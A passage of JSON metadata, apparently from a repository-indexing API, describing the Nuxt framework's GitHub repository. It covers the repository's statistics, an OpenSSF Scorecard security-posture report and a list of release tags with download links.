Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.1/manifests"},{"name":"v4.1.0","sha":"e12125a97f91a9c9b98191e4b89a2fcc95c318db","kind":"commit","published_at":"2025-09-02T22:12:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.0/manifests"},{"name":"v3.19.0","sha":"895650538445a18b588e09c74d9cb640693b63f6","kind":"commit","published_at":"2025-09-02T22:12:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.0/manifests"},{"name":"v4.0.3","sha":"c09da8cfa0684bf70a3d657add7feb88ffd7807d","kind":"commit","published_at":"2025-08-05T08:26:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.3/manifests"},{"name":"v3.18.1","sha":"dfac5a97d2ec084e194c04f643221118fec9e4c6","kind":"commit","published_at":"2025-08-05T08:26:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.1/manifests"},{"name":"v4.0.2","sha":"5d3ef933c3ab2ee9aa3141b3fea7b1549ade7b3a","kind":"commit","published_at":"2025-07-28T23:50:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.2/manifests"},{"name":"v3.18.0","sha":"8d9ebfb2a10596211996778fb14b35a20024c319","kind":"commit","published_at":"2025-07-28T23:48:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.18.0/manifests"},{"name":"v4.0.1","sha":"3cfdac3c204c9d64240719f64935484b2b3318f2","kind":"commit","published_at":"2025-07-21T08:55:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"8aacdde48e8388c8bb11b9a5c2f59935341bfcfd","kind":"commit","published_at":"2025-07-15T22:15:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0/manifests"},{"name":"v3.17.7","sha":"b56bc134455391f3ea43d29140162f0b04b615b0","kind":"commit","published_at":"2025-07-13T19:25:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar